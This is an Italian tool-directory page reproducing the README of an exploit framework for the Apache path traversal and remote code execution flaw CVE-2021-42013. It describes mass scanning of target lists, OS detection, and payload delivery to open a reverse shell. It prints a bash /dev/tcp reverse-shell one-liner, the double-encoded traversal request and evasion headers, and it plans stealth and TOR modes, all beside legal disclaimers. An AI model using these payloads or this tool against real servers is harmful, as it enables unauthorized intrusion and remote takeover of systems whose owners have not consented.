Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC-CVE-2021-42013-EXPLOIT — Uno strumento avanzato di scansione, sfruttamento e interazione remota progettato per rilevare e sfruttare la vulnerabilità Apache Path Traversal + RCE (CVE-2021-42013) su server mal configurati. | Kitploit
Strumenti/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
RicognizioneScanner di VulnerabilitàGenerazione di PayloadExploitShellcodeSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and Control

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Strumento di Accesso Remoto
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

Uno strumento avanzato di scansione, sfruttamento e interazione remota progettato per rilevare e sfruttare la vulnerabilità Apache Path Traversal + RCE (CVE-2021-42013) su server mal configurati.

Vedi Repository
41 anno faNon ancora revisionato
Condividi

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


root@kitploit:~
# 🔥 CVE-2021-42013 Exploit Framework di Makaveli

> 💀 Modalità Hacker Cosmico Multidimensionale attivata...

Uno strumento avanzato di scansione, sfruttamento e interazione remota progettato per rilevare e sfruttare la vulnerabilità **Apache Path Traversal + RCE (CVE-2021-42013)** in server mal configurati.

---

## ⚠️ Avvertenza Legale

> Questo software è fornito esclusivamente a scopo educativo e di ricerca in ambienti controllati.

L'uso di questo strumento contro sistemi senza autorizzazione espressa può essere illegale e costituisce un reato in molti paesi.

L'autore non si assume alcuna responsabilità per l'uso improprio di questo codice. Usalo a tuo rischio e sempre con il permesso esplicito del proprietario del sistema bersaglio.

---

 🧠 Descrizione Tecnica

Questo strumento consente di:

- ✅ Scansionare più bersagli da un file `.txt`.
- ✅ Rilevare automaticamente la presenza di CVE-2021-42013.
- ✅ Identificare il sistema operativo remoto (Linux o Windows).
- ✅ Inviare payload personalizzati in base al sistema rilevato.
- ✅ Stabilire una reverse shell e ottenere accesso remoto.
- ✅ Interagire con la shell in tempo reale tramite un listener integrato.
- ✅ Usufruire di log avanzati, barra di avanzamento e menu interattivo.

---

## 🔧 Requisiti

- Python **3.8+**
- Sistemi basati su Unix/Linux/MacOS (uso di `subprocess` e `curl`)
- Richiede le seguenti librerie Python:

```bash
pip install -r requirements.txt
```

**`requirements.txt`**

```
rich
alive-progress
```

È inoltre necessario avere `curl` installato sul sistema operativo.

---

## 📁 Struttura dei File

```
.
├── POC-CVE.py       # Script principal
├── logs.txt              # Archivo de logs generado automáticamente
├── requirements.txt      # Dependencias Python
└── targets.txt           # (Opcional) Lista de URLs a escanear
```

---

## 🚀 Uso Interattivo

```bash
python3 POC-CVE.py
```

Scegli tra:

* `scan_file`: Scansiona più URL da un file e mostra quali sono vulnerabili.
* `exploit`: Sfruttamento diretto di un singolo bersaglio, con reverse shell.
* `exit`: Uscire dalla modalità interattiva.

---

## 🔍 Scansione Massiva (scan\_file)

1. Crea un file con un elenco di URL, uno per riga:

```txt
http://example.com
http://victim.net
http://192.168.1.100
```

2. Avvia la scansione:

```bash
python3 POC-CVE.py
```

Scegli `scan_file` e fornisci:

* Il percorso del file
* Il numero di thread per la scansione parallela

---

## 💥 Sfruttamento (exploit)

1. Scegli `exploit` dal menu.
2. Inserisci:

* L'URL del bersaglio
* Il tuo IP locale (`LHOST`) per ricevere la shell
* Una porta libera (`LPORT`) per il listener

Lo script:

* Rileverà se il bersaglio è vulnerabile.
* Invierà un payload adeguato in base al sistema operativo remoto.
* Aprirà un **listener** e ti fornirà accesso interattivo.

---

## 🧪 Esempio di Payload

### Payload Linux (Bash TCP Reverse Shell)

```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```

### Payload Windows (PowerShell TCP Reverse Shell)

```powershell
powershell -NoP -NonI -W Hidden -Command ...
```

---

## 🧠 Tecniche Utilizzate

* Path traversal con doppia codifica (`/.%252e/.%252e/.%252e`)
* Iniezione di comandi tramite `curl`
* Intestazioni di evasione (`User-Agent`, `Accept`, ecc.)
* Reverse shell per assumere il controllo remoto
* Multithreading e barra di avanzamento (Alive Progress)
* Logging con timestamp e Rich Console

---

## 📌 Riferimento CVE

* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **Vettore di attacco**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **Impatto**: RCE (Remote Code Execution)
* **CVSS Score**: 9.8 (Critico)

---

## 🧙‍♂️ Autore

* ✨ **Makaveli** — *"Hackera la tua stessa realtà"*

---

## 🛡️ Disclaimer

> Questo progetto è fornito "così com'è", senza garanzie né responsabilità per danni derivanti dal suo utilizzo.
> **Non scansionare né sfruttare mai un sistema senza il consenso esplicito del suo proprietario.**

---

## ✅ Buone Pratiche

* Usa questo script esclusivamente in **ambienti di laboratorio** o test autorizzati.
* Assicurati che la porta definita per il listener sia **aperta** e **senza firewall**.
* Esegui come utente normale (non root), a meno che non sia strettamente necessario.

---

## 🧩 Roadmap Futura (Opzionale)

* [ ] Supporto per payload personalizzati
* [ ] Esportazione dei risultati in CSV/JSON
* [ ] Modalità stealth con rotazione degli header e proxy TOR
* [ ] Interfaccia web locale (Flask)

```

---

```

---

@DonMakaveliw, sei pronto a creare il futuro?
---

<p align="center">
  <img src="https://img.shields.io/badge/License-MIT-blue.svg" />
  <img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&amp;logo=python&amp;logoColor=FFD43B" />
  <img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
  <img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
  <img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
  <img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>
Scarica lo strumento